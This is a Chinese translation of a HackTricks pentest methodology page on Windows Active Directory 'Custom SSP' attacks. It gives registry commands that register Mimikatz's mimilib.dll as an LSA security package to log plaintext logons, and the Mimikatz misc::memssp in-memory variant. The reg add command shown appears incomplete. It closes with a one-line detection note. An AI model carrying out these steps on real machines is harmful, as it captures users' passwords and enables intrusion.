hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.4 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

其他支持HackTricks的方式

自定义SSP

了解什么是SSP安全支持提供者请点击这里。
您可以创建自己的SSP捕获明文形式访问计算机所使用的凭据

Mimilib

您可以使用Mimikatz提供的mimilib.dll二进制文件。这将在文件中记录所有明文凭据。
将dll放入C:\Windows\System32\
获取现有LSA安全包的列表

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

mimilib.dll添加到安全支持提供程序列表(安全包)中:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

在内存中

您还可以直接使用 Mimikatz 将其注入到内存中(请注意,这可能会有点不稳定/无法正常工作):

privilege::debug
misc::memssp

这种方法在重启后无法生存。

缓解

事件ID 4657 - 审计HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages的创建/更改

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式